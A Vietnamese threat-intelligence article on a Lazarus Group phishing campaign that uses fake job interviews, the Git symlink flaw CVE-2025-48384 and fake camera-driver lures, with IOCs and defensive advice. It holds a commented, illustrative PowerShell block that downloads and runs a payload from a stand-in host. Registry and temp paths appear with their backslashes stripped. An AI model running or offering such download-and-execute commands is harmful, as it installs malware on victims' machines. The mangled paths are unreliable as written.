Nhóm Lazarus Group (APT38), một tổ chức tội phạm mạng do nhà nước bảo trợ nổi tiếng với các hoạt động gián điệp mạng có động cơ tài chính, đã khởi xướng một chiến dịch lừa đảo mới. Chiến dịch này được đội ngũ an ninh của KuCoin phát hiện, nhắm mục tiêu vào các tổ chức tài chính và tiền điện tử trên toàn cầu với các chiến thuật ngày càng tinh vi.

Tổng Quan Về Lazarus Group và Các Mối Đe Dọa Mạng

Trong thập kỷ qua, Lazarus Group đã tập trung vào các ngân hàng, sàn giao dịch tiền điện tử và các doanh nghiệp liên quan. Nhóm này sử dụng chiến lược kết hợp giữa các nỗ lực lừa đảo hàng loạt và tấn công chính xác, tối đa hóa cả phạm vi tiếp cận và tác động.

Chiến Lược Tấn Công Đa Dạng

Lazarus Group triển khai nhiều vector tấn công khác nhau để đạt được mục tiêu của mình. Các phương pháp này bao gồm:

• Các chiến dịch spear-phishing (lừa đảo có chọn lọc) sử dụng tin tuyển dụng giả mạo và email mạo danh.
• Các cuộc tấn công watering-hole (ao nước) thông qua việc xâm nhập các trang web thường xuyên được truy cập.
• Xâm nhập chuỗi cung ứng thông qua các gói Git và npm bị nhiễm độc.
• Kỹ thuật social engineering (tấn công phi kỹ thuật) được tùy chỉnh cao theo hồ sơ nạn nhân.

Quy Trình Lừa Đảo Điển Hình

Các chuỗi lừa đảo của Lazarus Group thường bắt đầu trên LinkedIn, Telegram hoặc X. Kẻ tấn công giả mạo làm nhà tuyển dụng để dụ dỗ mục tiêu vào các kịch bản “phỏng vấn”. Cuối cùng, nạn nhân bị lừa chạy mã độc để thu thập thông tin đăng nhập và rút tiền điện tử.

Khai Thác Lỗ Hổng Git Symlink: CVE-2025-48384

Một điểm đáng chú ý trong chiến dịch lừa đảo mới này là việc khai thác lỗ hổng CVE-2025-48384, một lỗ hổng Git symlink mới được công bố. Lỗ hổng này cho phép kẻ tấn công thực thi mã độc thông qua một kho lưu trữ Git độc hại.

Cơ Chế Khai Thác Kỹ Thuật

Trong các tình huống tương tác chuyên môn kỹ thuật, nạn nhân được yêu cầu thực hiện một “bài kiểm tra mã hóa” bằng cách sao chép một kho lưu trữ độc hại. Trong quá trình sao chép (clone) repository, Git sẽ theo một symlink trong thư mục api/db_drivers. Symlink này trỏ đến các module nội bộ của repository, kích hoạt một hook post-checkout đã được cài đặt sẵn.

Hook này kích hoạt một backdoor Node.js (mongodb.hook.js), thiết lập kết nối liên tục để phân phối các payload tiếp theo. Chi tiết về lỗ hổng này có thể được tham khảo thêm tại blog của KuCoin.

Kịch Bản Tấn Công Mục Tiêu Kỹ Thuật và Phi Kỹ Thuật

Lazarus Group tùy chỉnh chiến thuật tấn công dựa trên hồ sơ của mục tiêu, bao gồm cả nhân viên kỹ thuật và phi kỹ thuật.

Tấn Công Mục Tiêu Kỹ Thuật

Nạn nhân kỹ thuật thường bị dụ thực hiện “bài kiểm tra mã hóa” bằng cách nhân bản (clone) kho lưu trữ Git chứa mã độc. Kịch bản này tận dụng sự tin tưởng vào quy trình tuyển dụng và các hoạt động phát triển phần mềm thông thường.

Tấn Công Mục Tiêu Phi Kỹ Thuật

Đối với nhân viên phi kỹ thuật, các tác nhân đe dọa sử dụng LinkedIn và X (Twitter) để thực hiện các cuộc phỏng vấn giả mạo. Các nạn nhân bị chuyển hướng đến các trang web giả mạo như aptiscore.com, nơi các biểu mẫu nhập liệu được sử dụng để duy trì sự tương tác kéo dài.

Kịch Bản Giả Lập Lỗi Driver Camera

Một hình thức lừa đảo khác liên quan đến một trang web phỏng vấn video giả mạo, tuyên bố có lỗi “camera driver missing”. Nạn nhân liên tục nhận được các cửa sổ bật lên yêu cầu thực thi một tập lệnh shell. Trong “cuộc gọi video” giả mạo, nạn nhân được hướng dẫn chạy lệnh terminal từ technudge.pr, vô tình cài đặt phần mềm độc hại.

Phân tích tập lệnh cài đặt cho thấy khả năng thu thập thông tin hệ thống, kiểm soát tệp từ xa và rò rỉ thông tin đăng nhập trước khi tự xóa để tránh bị phát hiện.

Cơ Chế Lây Nhiễm trên macOS

Trên hệ điều hành macOS, tập lệnh cài đặt sẽ tải xuống và cài đặt cdrivMac.sh. Đây là một công cụ tải xuống và duy trì quyền truy cập, sau đó nó tìm nạp một kho lưu trữ ZIP (CDrivers.zip). Kho lưu trữ này chứa một stealer dựa trên Go và tiện ích ChAudioFixer.app được ngụy trang.

Một LaunchAgent plist đảm bảo việc thực thi khi đăng nhập, cho phép đánh cắp mật khẩu, cookie và ví điện tử. Thông tin chi tiết hơn về các cuộc tấn công macOS tương tự có thể tìm thấy tại GBHackers.com.

Cơ Chế Lây Nhiễm trên Windows

Trên hệ điều hành Windows, nạn nhân được yêu cầu chạy lệnh PowerShell hoặc CMD để tải xuống cdrivWin.zip. Tệp này được giải nén vào thư mục %TEMP%cdrivWin. Một tập lệnh update.vbs sau đó trích xuất nvidia.py và thực thi nó thông qua một tệp python.exe đã đổi tên (csshost.exe), sau đó đăng ký khả năng duy trì thông qua một khóa registry dưới SoftwareMicrosoftWindowsCurrentVersionRun.

# Ví dụ lệnh PowerShell được sử dụng để tải xuống và giải nén (giả định)
# Lệnh thực tế có thể khác, đây là minh họa cơ chế.
# wget -Uri http://malicious.site/cdrivWin.zip -OutFile $env:TEMPcdrivWin.zip
# Expand-Archive -Path $env:TEMPcdrivWin.zip -DestinationPath $env:TEMPcdrivWin
# Start-Process -FilePath "$env:TEMPcdrivWinupdate.vbs"

Các Chỉ Số Thỏa Hiệp (IOCs) và Dấu Hiệu Nhận Biết

Bộ công cụ hiện tại của Lazarus Group có chung cơ sở hạ tầng với các hoạt động trước đây của nhóm. Điều này bao gồm sự cố đầu độc npm lợi dụng các gói cors-parser và việc sử dụng Dropbox để trích xuất dữ liệu trên Mac. Nhóm tiếp tục thực hiện các cuộc tấn công chuỗi cung ứng thông qua các module npm bị nhiễm độc (ví dụ: matrix-charts, rtkl), các kho lưu trữ GitHub riêng tư bị xâm nhập và các gói ZIP độc hại.

Xu hướng làm xáo trộn URLComponents trong các biến thể mới hơn cho thấy sự tinh chỉnh liên tục của nhóm để né tránh các công cụ bảo mật.

Các IOCs chính liên quan đến chiến dịch này:

• Nhóm Tấn Công: Lazarus Group (APT38)
• Lỗ Hổng Khai Thác: CVE-2025-48384 (Git symlink vulnerability)
• Các Tên Miền Độc Hại (Liên quan đến Phishing):
  • aptiscore.com
  • technudge.pr
• Tên Tập Tin/Malware trên macOS:
  • cdrivMac.sh
  • CDrivers.zip
  • ChAudioFixer.app
• Tên Tập Tin/Malware trên Windows:
  • cdrivWin.zip
  • update.vbs
  • nvidia.py
  • csshost.exe (python.exe đã đổi tên)
• Các Gói NPM độc hại:matrix-charts, rtkl (và các biến thể khác)
• Kỹ thuật Persistent trên macOS: LaunchAgent plist
• Kỹ thuật Persistent trên Windows: Registry key dưới SoftwareMicrosoftWindowsCurrentVersionRun

Biện Pháp Phòng Ngừa và Tăng Cường An Ninh Mạng

Chiến dịch lừa đảo mới nhất của Lazarus Group một lần nữa nhấn mạnh mối đe dọa dai dẳng đối với các lĩnh vực tiền điện tử và tài chính. Các tổ chức và cá nhân cần cảnh giác cao độ để bảo vệ an ninh mạng của mình.

Khuyến Nghị Bảo Mật

• Từ chối các bài kiểm tra kỹ thuật không mong muốn: Tuyệt đối không thực hiện các bài kiểm tra mã hóa hoặc tác vụ tương tự từ các nguồn không xác định hoặc đáng ngờ.
• Kiểm tra kỹ lưỡng nguồn gốc kho lưu trữ: Luôn xác minh tính hợp lệ và độ tin cậy của các kho lưu trữ Git trước khi sao chép hoặc tương tác.
• Tránh thực thi các tập lệnh không rõ: Không chạy bất kỳ tập lệnh shell hoặc lệnh terminal nào được cung cấp từ các nguồn không đáng tin cậy.
• Cập nhật hệ thống và phần mềm: Đảm bảo rằng tất cả các hệ thống và ứng dụng, bao gồm cả Git, được cập nhật với các bản vá bảo mật mới nhất để khắc phục các lỗ hổng CVE đã biết.
• Đào tạo nâng cao nhận thức: Thường xuyên đào tạo nhân viên về các mối đe dọa lừa đảo, social engineering và cách nhận biết các email/tin nhắn đáng ngờ.

Sự cảnh giác và hoài nghi vẫn là tuyến phòng thủ đầu tiên chống lại các cuộc tấn công lừa đảo và chuỗi cung ứng tinh vi này.